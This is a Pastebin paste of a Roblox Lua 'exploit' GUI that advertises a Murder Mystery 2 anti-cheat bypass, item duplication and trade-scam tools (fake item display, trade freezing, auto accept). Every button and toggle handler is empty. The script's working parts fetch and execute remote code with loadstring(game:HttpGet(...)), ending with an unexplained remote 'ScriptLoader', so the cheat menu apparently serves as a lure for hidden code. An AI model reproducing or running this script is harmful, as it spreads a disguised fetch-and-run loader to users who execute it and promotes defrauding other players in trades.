Advertisement
daplayzx

TrickGUI

Aug 1st, 2024 (edited)
3,017
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 3.19 KB | None | 0 0
  1. game:GetService("StarterGui"):SetCore("SendNotification", {
  2.         Title = "Activate Bypass!";
  3.         Text = "TrickPloits on TOP";
  4.         Icon = "rbxthumb://type=Asset&id=15992568695&w=150&h=150"})
  5.     Duration = 101;
  6.  
  7. game:GetService("StarterGui"):SetCore("SendNotification", {
  8.         Title = "Success!";
  9.         Text = "Enjoy!";
  10.         Icon = "rbxthumb://type=Asset&id=15992568695&w=150&h=150"})
  11.     Duration = 101;
  12.  
  13. local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/slf0Dev/Ocerium_Project/main/Library.lua"))()
  14. Window = Library.Main("TrickPloits GUI","LeftAlt") -- change "LeftAlt" to key that you want will hide gui
  15.  
  16.  
  17. --//tab
  18. local Tab = Window.NewTab("⚠️ PLEASE READ ⚠️")
  19.  
  20.  
  21. --//section
  22. local Section = Tab.NewSection("• IF DON'T WORK, EXECUTE AGAIN!!!")
  23.  
  24.  
  25. --//section
  26. local Section = Tab.NewSection("• JOIN DISCORD! .gg/exwwQM4kcu")
  27.  
  28.  
  29. --//section
  30. local Section = Tab.NewSection("• GO TO BYPASS SECTION AND CLICK BYPASS ANTICHEAT")
  31.  
  32.  
  33. --//section
  34. local Section = Tab.NewSection("• WAIT 5 MINUTES FOR IT TO BYPASS")
  35.  
  36.  
  37. --//section
  38. local Section = Tab.NewSection("• IF YOU CLICK ANYTHING ELSE DURING BYPASS YOU WILL FREEZE")
  39.  
  40.  
  41. --//tab
  42. local Tab = Window.NewTab("Bypass 🟢")
  43.  
  44.  
  45. --//section
  46. local Section = Tab.NewSection("• WAIT 5 MINUTES FOR IT TO BYPASS")
  47.  
  48.  
  49. --//Toggles
  50. local DisabledToggle = Section.NewToggle("Bypass MM2 Anti-Cheat",function(bool)
  51. end,false) -- "true" is the default value of toggle
  52.  
  53.  
  54. --//tab
  55. local Tab = Window.NewTab("Dupe 🟢")
  56.  
  57.  
  58. --//section
  59. local Section = Tab.NewSection("🟢 = Working 🟡 = Partially Working 🔴 = Patched")
  60.  
  61.  
  62. --//section
  63. local Section = Tab.NewSection("(once you click duping should begin it’s finished once you reset)")
  64.  
  65.  
  66. --//section
  67. local Section = Tab.NewSection("[COULD BE A FEW MINUTES]")
  68.  
  69.  
  70. --//Toggles
  71. local DisabledToggle = Section.NewToggle("Enable dupe.lua",function(bool)
  72. end,false) -- "true" is the default value of
  73.  
  74.  
  75. --// Button
  76. local Button = Section.NewButton("Dupe Guns and Knives",function()
  77. end)
  78.  
  79.  
  80. --// Button
  81. local Button = Section.NewButton("Dupe Pets (BETA)",function()
  82. end)
  83.  
  84.  
  85. --// Button
  86. local Button = Section.NewButton("Dupe Coins and Gems (BETA)",function()
  87. end)
  88.  
  89.  
  90. --//tab
  91. local Tab = Window.NewTab("Trade Scam 🟢")
  92.  
  93.  
  94. --//section
  95. local Section = Tab.NewSection("Step 1: Put in items, Step 2: Enable freeze.lua, Step 3: Freeze Trade.")
  96.  
  97.  
  98. --//Toggles
  99. local DisabledToggle = Section.NewToggle("Enable freeze/trade/genui.lua",function(bool)
  100. end,false) -- "true" is the default value of
  101.  
  102.  
  103. --// Button
  104. local Button = Section.NewButton("Freeze Trade",function()
  105. end)
  106.  
  107.  
  108. --//section
  109. local Section = Tab.NewSection("TradeScamV2")
  110.  
  111.  
  112. --//Toggles
  113. local DisabledToggle = Section.NewToggle("Enable tradescamv2.lua",function(bool)
  114. end,false) -- "true" is the default value of
  115.  
  116.  
  117. --// Button
  118. local Button = Section.NewButton("Display Fake Items",function()
  119. end)
  120.  
  121.  
  122. --// Button
  123. local Button = Section.NewButton("Auto Accept",function()
  124. end)
  125.  
  126.  
  127. --//tab
  128. local Tab = Window.NewTab("Item Stealer (soon)")
  129.  
  130.  
  131.  
  132. getgenv().gui = false
  133. loadstring(game:HttpGet("https://raw.githubusercontent.com/Tqvinoxzc/OrionLibrary/main/ScriptLoader"))()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement